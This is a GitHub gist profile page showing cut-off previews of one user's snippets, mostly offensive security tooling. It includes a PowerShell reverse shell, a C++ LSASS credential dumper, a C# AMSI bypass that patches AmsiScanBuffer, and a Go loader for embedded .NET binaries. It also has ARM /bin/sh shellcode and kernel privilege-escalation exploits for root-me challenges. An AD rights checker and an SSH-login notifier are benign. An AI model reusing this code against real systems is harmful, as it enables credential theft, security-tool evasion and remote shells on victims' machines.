Skip to content

Instantly share code, notes, and snippets.

View full-sized avatar

HopHouse

11 followers · 9 following
  • France
View GitHub Profile
@HopHouse
HopHouse / PasswordResetRight.ps1
Last active April 15, 2021 07:52
View PasswordResetRight.ps1
# Associated blog post : https://blog.hophouse.fr/_posts/CheckResetPasswordRights.html
function Get-ADAllUserGroupMembership {
<#
.SYNOPSIS
Recursively retrieve all the groups where a specified group belongs to.
.EXAMPLE
PS> Get-ADAllUserGroupMembership -Server 10.10.10.10 -GroupName custom_admin
.PARAMETER Server
@HopHouse
HopHouse / powershell-reverseshell.ps1
Last active August 19, 2020 07:56
Reverse shell in Powershell retrieved on the Internet.
View powershell-reverseshell.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@HopHouse
HopHouse / go-sharp-loader.go
Last active August 5, 2020 22:15 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
View go-sharp-loader.go
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ GOOS=windows go get -u github.com/gobuffalo/packr/packr
Place all your EXEs are in a "binaries" folder
@HopHouse
HopHouse / dumper.cpp
Created June 9, 2020 19:42
View dumper.cpp
/*
* Took from https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
*/
#include "stdafx.h"
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
using namespace std;
@HopHouse
HopHouse / AmsiByPass.cs
Created April 22, 2020 16:31
From https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
View AmsiByPass.cs
public static string run()
{
IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll
if (dllHandle == null) return "error";
//Get the AmsiScanBuffer function address
IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer");
if (AmsiScanbufferAddr == null) return "error";
IntPtr OldProtection = Marshal.AllocHGlobal(4); //pointer to store the current AmsiScanBuffer memory protection
@HopHouse
HopHouse / telegram_notif.sh
Last active July 9, 2019 19:56
Send Telegram noification after SSH connection
View telegram_notif.sh
#!/bin/bash
# Edit /etc/pam.d/sshd and put the following line:
# session optional pam_exec.so /root/telegram.sh
USERID="<USER ID>"
KEY="<KEY>"
TIMEOUT="10"
URL="https://api.telegram.org/bot$KEY/sendMessage"
DATE_EXEC="$(date "+%d %b %Y %H:%M")" #Collect date & time.
@HopHouse
HopHouse / exploit.S
Last active July 31, 2018 13:02
SYSCALL ARM
View exploit.S
.data
sh:
.asciz "//bin/sh"
result:
.word 0x00000000
.text
.global _start
@HopHouse
HopHouse / exploit.c
Last active January 2, 2018 15:25
CH3 root-me - 64 Bits Race Condition
View exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <fcntl.h>
void get_shell() {
@HopHouse
HopHouse / exploit.c
Last active January 2, 2018 15:29
CH2 root-me
View exploit.c
/*
* Rouvès Quentin - rouves.quentin@hotmail.fr
* Exploit NULL Dereference kernel module
* Exec: gcc exploit.c -static -m32 -o exploit
*/
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
@HopHouse
HopHouse / ch1.c
Last active November 13, 2017 14:27
Ch1 root-me
View ch1.c
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
// commit cred: c1070e80
// prepare kernel cred c10711f0